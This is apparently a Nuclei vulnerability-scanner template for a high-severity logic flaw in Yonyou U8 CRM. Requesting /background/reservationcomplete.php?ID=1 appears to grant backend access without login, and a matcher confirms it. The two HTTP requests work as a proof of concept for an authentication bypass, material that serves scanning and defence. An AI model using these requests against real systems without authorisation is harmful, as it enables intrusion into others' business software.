/background/reservationcomplete.php?ID=1
id: yongyouU8_CRM-reservationcomplete
info:
name: 用友CRM系统存在逻辑漏洞直接登录后台
author: wy876
severity: high
http:
- raw:
- |
GET /background/reservationcomplete.php?ID=1 HTTP/1.1
Host: {{Hostname}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
- |
GET / HTTP/1.1
Host: {{Hostname}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
matchers:
- type: dsl
dsl:
- 'contains(body_2,"\"msg\": \"bgsesstimeout-\", \"serverName\"")'